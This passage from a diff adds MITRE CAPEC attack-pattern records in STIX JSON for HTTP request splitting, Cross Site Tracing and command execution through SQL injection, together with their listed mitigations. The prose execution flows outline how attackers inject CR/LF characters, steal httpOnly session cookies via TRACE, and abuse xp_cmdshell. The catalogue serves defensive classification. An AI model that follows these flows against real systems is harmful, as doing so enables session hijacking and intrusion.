"attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b", + "attack-pattern--ce92f5b9-6228-4354-8a1b-72ad7ad3bb84" + ], + "x_capec_child_of_refs": [ + "attack-pattern--9c983530-1927-43ca-addd-63d149cda4a7" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Execute Unauthorized Commands", + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "\n Microsoft Internet Explorer versions 5.01 SP4 and prior, 6.0 SP2 and prior, and 7.0 contain a vulnerability that could allow an unauthenticated, remote adversary to conduct HTTP request splitting and smuggling attacks. The vulnerability is due to an input validation error in the browser that allows adversaries to manipulate certain headers to expose the browser to HTTP request splitting and smuggling attacks. Attacks may include cross-site scripting, proxy cache poisoning, and session fixation. In certain instances, an exploit could allow the adversary to bypass web application firewalls or other filtering devices. Microsoft has confirmed the vulnerability and released software updates.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey network to identify target: The adversary performs network reconnaissance by monitoring relevant traffic to identify the network path and parsing of the HTTP messages with the goal of identifying potential targets.

    2. Techniques
    Scan networks to fingerprint HTTP infrastructure and monitor HTTP traffic to identify HTTP network path with a tool such as a Network Protocol Analyzer.

Experiment

  1. Identify vulnerabilities in targeted HTTP infrastructure and technologies: The adversary sends a variety of benign/ambiguous HTTP requests to observe responses from HTTP infrastructure in order to identify differences/discrepancies in the interpretation and parsing of HTTP requests by examining supported HTTP protocol versions, HTTP headers, syntax checking and input filtering.

  2. Cause differential HTTP responses by experimenting with identified HTTP Request vulnerabilities: The adversary sends maliciously crafted HTTP requests with custom strings and embedded web scripts and objects in HTTP headers to interfere with the parsing of intermediary and back-end HTTP infrastructure, followed by normal/benign HTTP request from the adversary or a random user. The intended consequences of the malicious HTTP requests will be observed in the HTTP infrastructure response to the normal/benign HTTP request to confirm applicability of identified vulnerabilities in the adversary's plan of attack.

    3. Techniques
    Continue the monitoring of HTTP traffic.
    \n Utilize different sequences of special characters (CR - Carriage Return, LF - Line Feed, HT - Horizontal Tab, SP - Space and etc.) to bypass filtering and back-end encoding and to embed:\n \n additional HTTP Requests with their own headers\n malicious web scripts into parameters of HTTP Request headers (e.g., browser cookies like Set-Cookie or Ajax web/browser object parameters like XMLHttpRequest)\n adversary chosen encoding (e.g., UTF-7)\n \n to utilize additional special characters (e.g., > and <) filtered by the target HTTP agent.\n Note that certain special characters and character encoding may be applicable only to intermediary and front-end agents with rare configurations or that are not RFC compliant.\n
    Follow an unrecognized (sometimes a RFC compliant) HTTP header with a subsequent HTTP request to potentially cause the HTTP request to be ignored and interpreted as part of the preceding HTTP request.

Exploit

  1. Perform HTTP Request Splitting attack: Using knowledge discovered in the experiment section above, smuggle a message to cause one of the consequences.

    2. Techniques
    Leverage techniques identified in the Experiment Phase.
", + "x_capec_extended_description": "\n This entails the adversary injecting malicious user input into various standard and/or user defined HTTP headers within a HTTP Request through user input of Carriage Return (CR), Line Feed (LF), Horizontal Tab (HT), Space (SP) characters as well as other valid/RFC compliant special characters and unique character encoding. This malicious user input allows for web script to be injected in HTTP headers as well as into browser cookies or Ajax web/browser object parameters like XMLHttpRequest during implementation of asynchronous requests.\n This attack is usually the result of the usage of outdated or incompatible HTTP protocol versions as well as lack of syntax checking and filtering of user input in the HTTP agents receiving HTTP messages in the path.\n This differs from CAPEC-34 HTTP Response Splitting, which is usually an attempt to compromise a client agent (e.g., web browser) by sending malicious content in HTTP responses from back-end HTTP infrastructure. HTTP Request Splitting is an attempt to compromise aback-end HTTP agentvia HTTP Request messages.\n HTTP Smuggling (CAPEC-33 and CAPEC-273) is different from HTTP Splitting due to the fact it relies upon discrepancies in the interpretation of various HTTP Headers and message sizes and not solely user input of special characters and character encoding. HTTP Smuggling was established to circumvent mitigations against HTTP Request Splitting techniques.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_peer_of_refs": [ + "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80" + ], + "x_capec_prerequisites": [ + "An additional intermediary HTTP agent such as an application firewall or a web caching proxy between the adversary and the second agent such as a web server, that sends multiple HTTP messages over same network connection.", + "Differences in the way the two HTTP agents parse and interpret HTTP requests and its headers.", + "HTTP headers capable of being user-manipulated.", + "HTTP agents running on HTTP/1.0 or HTTP/1.1 that allow for Keep Alive mode, Pipelined queries, and Chunked queries and responses." + ], + "x_capec_resources_required": [ + "Tools capable of crafting malicious HTTP messages and monitoring HTTP messages responses." + ], + "x_capec_skills_required": { + "Medium": "Possess knowledge on the exact details in the discrepancies between several targeted HTTP agents in path of an HTTP message in parsing its message structure and individual headers." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: evaluate HTTP agents prior to deployment for parsing/interpretation discrepancies.", + "id": "course-of-action--94b24ec6-eaed-40ba-aa65-789101ea9a55", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4c7aff6e-7858-4273-ba44-dc920b8ff560", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--94b24ec6-eaed-40ba-aa65-789101ea9a55", + "spec_version": "2.1", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: front-end HTTP agents notice ambiguous requests.", + "id": "course-of-action--64555d1a-a57e-49d9-b9f8-02c843ba1af5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8d3cd512-2e70-4e56-a57c-507684d1f6d1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--64555d1a-a57e-49d9-b9f8-02c843ba1af5", + "spec_version": "2.1", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: back-end HTTP agents reject ambiguous requests and close the network connection.", + "id": "course-of-action--0bc589af-7ac3-4771-b1db-defb88ba61b5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b867b8e9-a2c3-4882-98c9-3d5fa142fddb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0bc589af-7ac3-4771-b1db-defb88ba61b5", + "spec_version": "2.1", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable reuse of back-end connections.", + "id": "course-of-action--65a59d08-b52c-4c78-b802-6e65c65f02e5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8a78056e-5c0e-44f8-800a-91b0b7178716", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--65a59d08-b52c-4c78-b802-6e65c65f02e5", + "spec_version": "2.1", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Use HTTP/2 for back-end connections.", + "id": "course-of-action--948de9b9-7ad6-4bf5-8daf-f2208db360d6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ffba3f90-bbb1-4ab0-bf6a-750ca56acabd", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--948de9b9-7ad6-4bf5-8daf-f2208db360d6", + "spec_version": "2.1", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Use the same web server software for front-end and back-end server.", + "id": "course-of-action--4bd16590-2382-4a10-9712-f28b7bf84fec", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c718be44-09e6-4be5-9a91-f792b8219ef4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4bd16590-2382-4a10-9712-f28b7bf84fec", + "spec_version": "2.1", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Utilize a Web Application Firewall (WAF) that has built-in mitigation to detect abnormal requests/responses.", + "id": "course-of-action--5cc83b32-2b3e-41e5-94e8-2e2ea48bf660", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--260f7f64-cbe9-46c3-b7b8-2528b37847d6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5cc83b32-2b3e-41e5-94e8-2e2ea48bf660", + "spec_version": "2.1", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Install latest vendor security patches available for both intermediary and back-end HTTP infrastructure (i.e. proxies and web servers)", + "id": "course-of-action--43085d5c-cd1e-4175-9d44-f28f8f3cc5f9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-7", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--558063de-9f07-40ca-a209-3935e9afaddd", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--43085d5c-cd1e-4175-9d44-f28f8f3cc5f9", + "spec_version": "2.1", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Ensure that HTTP infrastructure in the chain or network path utilize a strict uniform parsing process.", + "id": "course-of-action--50ea55ae-d8a8-4279-9dc9-05b6fb416b84", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-8", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1d29447c-15a4-4126-bef5-8a3dec2bc73a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--50ea55ae-d8a8-4279-9dc9-05b6fb416b84", + "spec_version": "2.1", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Utilize intermediary HTTP infrastructure capable of filtering and/or sanitizing user-input.", + "id": "course-of-action--a2e15722-f07d-44db-b988-af501e0f1e13", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-9", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4c046dff-3500-4208-a8f7-e7d170ad1267", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2e15722-f07d-44db-b988-af501e0f1e13", + "spec_version": "2.1", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it referes to an existing chain relationship between \"CAPEC-93 : Log Injection-Tampering-Forging\" and \"CAPEC-63 : Cross-Site Scripting\". Please refer to these CAPECs going forward.", + "external_references": [ + { + "external_id": "CAPEC-106", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/106.html" + } + ], + "id": "attack-pattern--87829d14-eece-4fa3-b36f-54cc3b2262ae", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: XSS through Log Files", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Cross Site Tracing (XST) enables an adversary to steal the victim's session cookie and possibly other authentication credentials transmitted in the header of the HTTP request when the victim's browser communicates to a destination system's web server.", + "external_references": [ + { + "external_id": "CAPEC-107", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/107.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "external_id": "CWE-648", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/648.html" + }, + { + "description": "Cross Site Tracing", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Cross_Site_Tracing" + }, + { + "description": "Jeremiah Grossman, Cross-Site Tracing (XST), 2003, WhiteHat Security", + "external_id": "REF-3", + "source_name": "reference_from_CAPEC", + "url": "http://www.cgisecurity.com/whitehat-mirror/WH-WhitePaper_XST_ebook.pdf" + } + ], + "id": "attack-pattern--f14acee3-770c-4154-a9b2-9eda908c6a9f", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Cross Site Tracing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346" + ], + "x_capec_child_of_refs": [ + "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n An adversary determines that a particular system is vulnerable to reflected cross-site scripting (XSS) and endeavors to leverage this weakness to steal the victim's authentication cookie. An adversary realizes that since httpOnly attribute is set on the user's cookie, it is not possible to steal it directly with their malicious script. Instead, the adversary has their script use XMLHTTP ActiveX control in the victim's IE browser to issue an HTTP TRACE to the target system's server which has HTTP TRACE enabled. The original HTTP TRACE request contains the session cookie and so does the echoed response. The adversary picks the session cookie from the body of HTTP TRACE response and ships it to the adversary. The adversary then uses the newly acquired victim's session cookie to impersonate the victim in the target system.\n In the absence of an XSS weakness on the site with which the victim is interacting, an adversary can get the script to come from the site that they control and get it to execute in the victim's browser (if they can trick the victim's into visiting their malicious website or clicking on the link that they supplies). However, in that case, due to the same origin policy protection mechanism in the browser, the adversary's malicious script cannot directly issue an HTTP TRACE request to the destination system's web server because the malicious script did not originate at that domain. An adversary will then need to find a way to exploit another weakness that would enable them to circumvent the same origin policy protection.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine if HTTP Trace is enabled: Determine if HTTP Trace is enabled at the web server with which the victim has an active session

    2. Techniques
    An adversary may issue an HTTP Trace request to the target web server and observe if the response arrives with the original request in the body of the response.

Experiment

  1. Identify mechanism to launch HTTP Trace request: The adversary attempts to force the victim to issue an HTTP Trace request to the targeted application.

    2. Techniques
    The adversary probes for cross-site scripting vulnerabilities to force the victim into issuing an HTTP Trace request.

Exploit

  1. Create a malicious script that pings the web server with HTTP TRACE request: The adversary creates a malicious script that will induce the victim's browser to issue an HTTP TRACE request to the destination system's web server. The script will further intercept the response from the web server, pick up sensitive information out of it, and forward to the site controlled by the adversary.

    2. Techniques
    The adversary's malicious script circumvents the httpOnly cookie attribute that prevents from hijacking the victim's session cookie directly using document.cookie and instead leverages the HTTP TRACE to catch this information from the header of the HTTP request once it is echoed back from the web server in the body of the HTTP TRACE response.

  2. Execute malicious HTTP Trace launching script: The adversary leverages an XSS vulnerability to force the victim to execute the malicious HTTP Trace launching script

  3. Intercept HTTP TRACE response: The adversary's script intercepts the HTTP TRACE response from teh web server, glance sensitive information from it, and forward that information to a server controlled by the adversary.

", + "x_capec_extended_description": "\n The adversary uses an XSS attack to have victim's browser sent an HTTP TRACE request to a destination web server, which will proceed to return a response to the victim's web browser that contains the original HTTP request in its body. Since the HTTP header of the original HTTP TRACE request had the victim's session cookie in it, that session cookie can now be picked off the HTTP TRACE response and sent to the adversary's malicious site. XST becomes relevant when direct access to the session cookie via the \"document.cookie\" object is disabled with the use of httpOnly attribute which ensures that the cookie can be transmitted in HTTP requests but cannot be accessed in other ways. Using SSL does not protect against XST. If the system with which the victim is interacting is susceptible to XSS, an adversary can exploit that weakness directly to get their malicious script to issue an HTTP TRACE request to the destination system's web server.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "HTTP TRACE is enabled on the web server", + "The destination system is susceptible to XSS or an adversary can leverage some other weakness to bypass the same origin policy", + "Scripting is enabled in the client's browser", + "HTTP is used as the communication protocol between the server and the client" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "Understanding of the HTTP protocol and an ability to craft a malicious script" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Administrators should disable support for HTTP TRACE at the destination's web server. Vendors should disable TRACE by default.", + "id": "course-of-action--16cc4cf6-75a8-41a1-bbc7-eff92929bc02", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-107-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--92929267-6931-47a1-b4dd-3fd1d012b7cf", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--16cc4cf6-75a8-41a1-bbc7-eff92929bc02", + "spec_version": "2.1", + "target_ref": "attack-pattern--f14acee3-770c-4154-a9b2-9eda908c6a9f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Patch web browser against known security origin policy bypass exploits.", + "id": "course-of-action--db00ffba-8edb-4b26-be69-98de08e8b45c", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-107-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eb4b5528-6e2e-4670-bfd3-983606f61020", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--db00ffba-8edb-4b26-be69-98de08e8b45c", + "spec_version": "2.1", + "target_ref": "attack-pattern--f14acee3-770c-4154-a9b2-9eda908c6a9f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (or could be part of the functionality of the same application) fetches the injected data stored in the database and uses this data as command line arguments without performing proper validation. The malicious data escapes that data plane by spawning new commands to be executed on the host.", + "external_references": [ + { + "external_id": "CAPEC-108", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/108.html" + }, + { + "external_id": "CWE-89", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/89.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-78", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/78.html" + }, + { + "external_id": "CWE-114", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/114.html" + } + ], + "id": "attack-pattern--89acf77d-723b-43b4-b66d-6eaafed52369", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Command Line Execution through SQL Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--7c90bef7-530c-427b-8fb7-f9d3eda9c26a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--42acc604-a86c-46f7-bd03-6e532c02d85e" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n SQL injection vulnerability in Cacti 0.8.6i and earlier, when register_argc_argv is enabled, allows remote attackers to execute arbitrary SQL commands via the (1) second or (2) third arguments to cmd.php. NOTE: this issue can be leveraged to execute arbitrary commands since the SQL query results are later used in the polling_items array and popen function (CVE-2006-6799).\n Reference: https://www.cve.org/CVERecord?id=CVE-2006-6799\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Probe for SQL Injection vulnerability: The attacker injects SQL syntax into user-controllable data inputs to search unfiltered execution of the SQL syntax in a query.

Exploit

  1. Achieve arbitrary command execution through SQL Injection with the MSSQL_xp_cmdshell directive: The attacker leverages a SQL Injection attack to inject shell code to be executed by leveraging the xp_cmdshell directive.

  2. Inject malicious data in the database: Leverage SQL injection to inject data in the database that could later be used to achieve command injection if ever used as a command line argument

  3. Trigger command line execution with injected arguments: The attacker causes execution of command line functionality which leverages previously injected database content as arguments.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The application does not properly validate data before storing in the database", + "Backend application implicitly trusts the data stored in the database", + "Malicious data is used on the backend as a command line argument" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "The attacker most likely has to be familiar with the internal functionality of the system to launch this attack. Without that knowledge, there are not many feedback mechanisms to give an attacker the indication of how to perform command injection or whether the attack is succeeding." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Disable MSSQL xp_cmdshell directive on the database", + "id": "course-of-action--d1918081-1fdb-428c-b1e3-8116e054620e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-108-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bb697224-7fb5-464b-bb81-e9cc28732c2d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d1918081-1fdb-428c-b1e3-8116e054620e", + "spec_version": 